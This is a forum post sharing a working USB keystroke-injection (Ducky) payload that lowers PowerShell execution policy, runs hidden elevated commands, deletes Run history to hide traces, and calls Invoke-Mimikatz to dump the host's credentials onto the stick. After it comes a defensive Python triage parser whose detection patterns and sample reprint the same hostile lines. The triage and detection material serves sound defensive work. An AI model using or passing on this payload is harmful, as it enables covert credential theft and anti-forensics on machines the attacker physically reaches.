Zereco
Everything posted by Zereco

Hey guys, awesome..! After 3 hours and so many things learned, it's finally running properly!! :) (Twin Duck)

Here's the full payload: there's an ESC to close the autorun window, set-executionpolicy remotesigned to allow running scripts on the system, and ALT F4 at the end to close the windows.

    DELAY 3000
    ESC
    DELAY 500
    GUI r
    DELAY 1000
    STRING powershell
    DELAY 300
    ENTER
    DELAY 300
    STRING set-executionpolicy remotesigned
    DELAY 300
    ENTER
    DELAY 300
    STRING o
    DELAY 300
    ENTER
    DELAY 300
    STRING exit
    DELAY 300
    ENTER
    DELAY 500
    GUI r
    DELAY 300
    STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=40 cols=160&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
    DELAY 500
    ENTER
    DELAY 1000
    STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set DUCKY=%d
    DELAY 300
    ENTER
    DELAY 1000
    STRING if exist %DUCKY%\mimi.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %DUCKY%\mimi.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%DUCKY%\%computername%_creds.txt';"
    DELAY 300
    ENTER
    DELAY 300
    ALT F4

Still, it needs 5-10 sec to write the log file.

Something else: here, https://ducktoolkit.com/encoder/, we apparently need to wipe the browser cache or something like that, because when you encode, it seems to encode the first payload you already encoded before.. (Am I clear :p?) Or it's just a bad move on my part.

Cheers guys
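For a defender who recovers a keystroke-injection script like the one above from a USB device or a disk image, the first job is triage: what would it have typed, how long would it have needed, and which lines matter? The following parser is an added example and is not code from the post or from any Ducky tooling. The indicator list is a constructed starting point (it matches the execution-policy change, hidden/non-interactive PowerShell, the RunMRU deletion, the elevation request and the credential-dump call that appear in the post), and the sample payload is a constructed, shortened version of the post's own lines.

```python
"""Triage helper for a recovered DuckyScript payload (added example, not from the post).

It reconstructs what the script would type (STRING lines), sums the scripted DELAYs,
lists the hotkeys, and flags typed lines that match a small set of indicators.
Both the indicator table and SAMPLE_PAYLOAD are constructed for illustration.
"""
import re
from dataclasses import dataclass, field

# Constructed indicator table: substrings that commonly mark policy weakening,
# hidden execution, anti-forensics or credential access in typed commands.
INDICATORS = {
    "execution policy change": re.compile(r"set-executionpolicy", re.I),
    "hidden/non-interactive powershell": re.compile(r"-W(indowStyle)?\s+Hidden|-NonI", re.I),
    "execution policy bypass": re.compile(r"-Exec(utionPolicy)?\s+Bypass", re.I),
    "run-history wiping": re.compile(r"reg\s+delete\s+.*RunMRU", re.I),
    "elevation request": re.compile(r"-Verb\s+runAs", re.I),
    "credential dumping": re.compile(r"Invoke-Mimikatz|-DumpCreds", re.I),
}


@dataclass
class Triage:
    typed_lines: list = field(default_factory=list)  # arguments of STRING commands
    total_delay_ms: int = 0                          # sum of all DELAY values
    hotkeys: list = field(default_factory=list)      # GUI/ALT/ESC/ENTER etc., as written
    findings: list = field(default_factory=list)     # (indicator label, typed line)


def parse_duckyscript(text: str) -> Triage:
    """Walk the script line by line; DuckyScript is one command per line."""
    t = Triage()
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.upper().startswith("REM"):
            continue                                  # blank or comment line
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        if cmd == "DELAY":
            t.total_delay_ms += int(arg or 0)
        elif cmd == "STRING":
            t.typed_lines.append(arg)
            for label, rx in INDICATORS.items():
                if rx.search(arg):
                    t.findings.append((label, arg))
        else:
            t.hotkeys.append(line)
    return t


def summarize(t: Triage) -> str:
    """Human-readable summary for an incident note."""
    out = [f"typed lines: {len(t.typed_lines)}",
           f"hotkeys: {len(t.hotkeys)}",
           f"scripted delay: {t.total_delay_ms / 1000:.1f} s (typing time not included)"]
    for label, line in t.findings:
        out.append(f"  [{label}] {line}")
    return "\n".join(out)


# Constructed sample: a shortened form of the payload quoted in the post.
SAMPLE_PAYLOAD = r"""
DELAY 3000
ESC
DELAY 500
GUI r
DELAY 1000
STRING powershell
DELAY 300
ENTER
STRING set-executionpolicy remotesigned
ENTER
STRING exit
ENTER
GUI r
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/k reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
ENTER
STRING if exist %DUCKY%\mimi.ps1 powershell -Exec Bypass "Import-Module %DUCKY%\mimi.ps1;Invoke-Mimikatz -DumpCreds"
ENTER
ALT F4
"""

if __name__ == "__main__":
    print(summarize(parse_duckyscript(SAMPLE_PAYLOAD)))
```

The summed DELAY is only a lower bound on the dwell time the device needed: keystroke typing time and the 5-10 seconds the post mentions for writing the output file come on top of it. The findings list is what you would carry into a detection review, since each flagged line corresponds to something that should be visible in PowerShell logging, process creation events or registry auditing on the affected host.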